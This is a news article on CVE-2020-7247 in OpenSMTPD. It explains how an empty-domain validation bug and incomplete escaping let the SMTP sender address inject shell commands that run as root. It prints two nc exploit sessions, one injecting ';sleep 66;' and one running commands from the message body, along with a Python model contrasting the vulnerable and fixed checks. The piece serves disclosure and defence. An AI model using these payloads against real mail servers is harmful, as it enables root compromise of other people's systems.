A vulnerability in OpenSMTPD that allows remote code execution with root privileges

A critical vulnerability (CVE-2020-7247) has been identified in the OpenSMTPD mail server developed by the OpenBSD project. It allows shell commands to be executed remotely on the server with root privileges. The vulnerability was found during an audit by Qualys Security (the previous audit of OpenSMTPD took place in 2015; the new vulnerability has existed since May 2018). The problem is fixed in the OpenSMTPD 6.6.2 release. All users are advised to install the update immediately (on OpenBSD the patch can be installed via syspatch).

Two attack vectors are described. The first works with the default OpenSMTPD configuration (accepting requests only from localhost) and allows the vulnerability to be exploited locally, when the attacker has access to the local network interface (loopback) on the server (for example, on hosting systems). The second applies when OpenSMTPD is configured to accept external network requests (a mail server that accepts third-party mail). The researchers have prepared an exploit prototype that works both against the OpenSMTPD version shipped with OpenBSD 6.6 and against the portable version for other operating systems (tested on Debian Testing).

The problem is caused by an error in the smtp_mailaddr() function, which is called to check the correctness of the values in the "MAIL FROM" and "RCPT TO" fields that identify the sender and recipient and are passed during the session with the mail server. To check the part of the email address that comes before the "@" symbol, smtp_mailaddr() calls valid_localpart(), which accepts (MAILADDR_ALLOWED) the characters "!#$%&'*/?^`{|}~+-=_", as required by RFC 5322.

Direct escaping of the string is performed in the mda_expand_token() function, which replaces only the characters "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). The line prepared by mda_expand_token() is then used when the delivery agent (MDA) is invoked via the call 'execle("/bin/sh", "/bin/sh", "-c", mda_command, ...'. When mail is delivered to an mbox through /bin/sh, the line "/usr/libexec/mail.local -f %{mbox.from} %{username}" is executed, where the value of "%{mbox.from}" includes data taken from the "MAIL FROM" parameter.

The essence of the vulnerability is that smtp_mailaddr() contains a logic error: if an empty domain is passed in the email address, the function returns a successful validation code even though the part of the address before the "@" contains invalid characters. In addition, when preparing the string, mda_expand_token() does not escape every possible special character, only the special characters that are permitted in an email address. As a result, to run a command of one's own it is enough to use the ";" character and a space in the local part of the email address, neither of which is included in the MAILADDR_ESCAPE set or escaped. For example:

$ nc 127.0.0.1 25

HELO professor.falken
MAIL FROM:
RCPT TO:
DATA
.
QUIT

After this session, OpenSMTPD, when delivering to an mbox, will run the following command through the shell:

/usr/libexec/mail.local -f ;sleep 66; root
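To make the two defects described above concrete, the following is an added Python model of the checks, written for this article and not OpenSMTPD's own code. The function names follow the advisory (valid_localpart, smtp_mailaddr, mda_expand_token); their bodies are reconstructions of the behaviour the text describes, valid_domainpart() is deliberately simplified, the default_domain value and the helper names split_address() and unescaped_shell_metachars() are assumptions, and the 64-character limit comes from the next paragraph. It shows why the vulnerable ordering accepts an invalid local part once the domain is empty, what the fixed ordering does instead, and which characters pass through the escaping step unchanged, which is the check an operator would want when reviewing sender addresses in SMTP session logs.

```python
"""Simplified model of the OpenSMTPD 6.6.1 address checks (CVE-2020-7247).

Added illustration, not OpenSMTPD's own code: names follow the advisory,
bodies are reconstructions of the behaviour it describes.
"""

# Characters valid_localpart() accepts besides letters and digits (RFC 5322 atext).
MAILADDR_ALLOWED = "!#$%&'*/?^`{|}~+-=_"
# Characters mda_expand_token() replaces (with ':') before the string reaches /bin/sh.
MAILADDR_ESCAPE = "!#$%&'*?`{|}~"
# The advisory's stated limit on the address part.
LOCALPART_MAX = 64


def valid_localpart(user: str) -> bool:
    """RFC 5322 dot-atom: one or more non-empty atoms of atext, separated by dots."""
    if not user or len(user) > LOCALPART_MAX:
        return False
    return all(atom and all(c.isalnum() or c in MAILADDR_ALLOWED for c in atom)
               for atom in user.split("."))


def valid_domainpart(domain: str) -> bool:
    """Simplified (assumption): non-empty labels of letters, digits and hyphens."""
    if not domain:
        return False
    return all(lbl and all(c.isalnum() or c == "-" for c in lbl)
               for lbl in domain.split("."))


def split_address(text: str):
    """'<user@domain>' -> (user, domain); a missing '@' yields an empty domain."""
    addr = text.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    user, _, domain = addr.partition("@")
    return user, domain


def smtp_mailaddr_vulnerable(text: str, mailfrom: bool, default_domain="localhost"):
    """Model of the 6.6.1 logic error: once the combined check fails and the
    domain is empty, the default domain is filled in and the address is accepted,
    regardless of whether it was the local part that failed."""
    user, domain = split_address(text)
    if not valid_localpart(user) or not valid_domainpart(domain):
        if mailfrom and user == "" and domain == "":
            return True, ""               # empty return path, needed for bounces
        if user == "":
            return False, None
        if domain == "":
            return True, default_domain   # BUG: local part is never re-checked
        return False, None
    return True, domain


def smtp_mailaddr_fixed(text: str, mailfrom: bool, default_domain="localhost"):
    """Corrected order: reject an invalid local part before filling in the domain."""
    user, domain = split_address(text)
    if mailfrom and user == "" and domain == "":
        return True, ""
    if user == "" or not valid_localpart(user):
        return False, None
    if domain == "":
        domain = default_domain
    if not valid_domainpart(domain):
        return False, None
    return True, domain


def mda_expand_token(s: str) -> str:
    """What the escaping step does to %{mbox.from}: MAILADDR_ESCAPE chars become ':'."""
    return "".join(":" if c in MAILADDR_ESCAPE else c for c in s)


def unescaped_shell_metachars(user: str):
    """Characters that are neither atext nor escaped, i.e. would reach /bin/sh
    unchanged. A non-empty result on an accepted sender is a red flag."""
    return sorted({c for c in user if c not in MAILADDR_ESCAPE
                   and not (c.isalnum() or c in MAILADDR_ALLOWED or c == ".")})


if __name__ == "__main__":
    # Constructed sample sender taken from the advisory's example session.
    sender = "<;sleep 66;>"
    print("vulnerable:", smtp_mailaddr_vulnerable(sender, mailfrom=True))
    print("fixed:     ", smtp_mailaddr_fixed(sender, mailfrom=True))
    print("after escaping:", mda_expand_token(split_address(sender)[0]))
    print("passes through unescaped:", unescaped_shell_metachars(split_address(sender)[0]))
```

Run as a script it shows the vulnerable model accepting the sender with the default domain substituted, the fixed model rejecting it, and ';' and the space surviving the escaping step untouched, while '$' and '|' would have been turned into ':'.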

At the same time, exploitation is constrained: the address part may not exceed 64 characters, and the special characters '$' and '|' are replaced with ":" during escaping. To get around these limits, the researchers use the fact that the message body is passed to /usr/libexec/mail.local, after it has been started, through its input stream: by manipulating the address one only needs to start the sh interpreter and then use the message body as the set of instructions. Since the service SMTP headers appear at the beginning of the message, the read command is used in a loop to skip them. The working exploit looks like this:

$ nc 192.168.56.143 25

HELO professor.falken
MAIL FROM:
RCPT TO: <[email protected]>
DATA
#0
#1
...
#d
for i in W O P R; do
echo -n "($i) " && id || break
done > /root/x."`id -u`"."$$"
.
QUIT

Source: opennet.ru
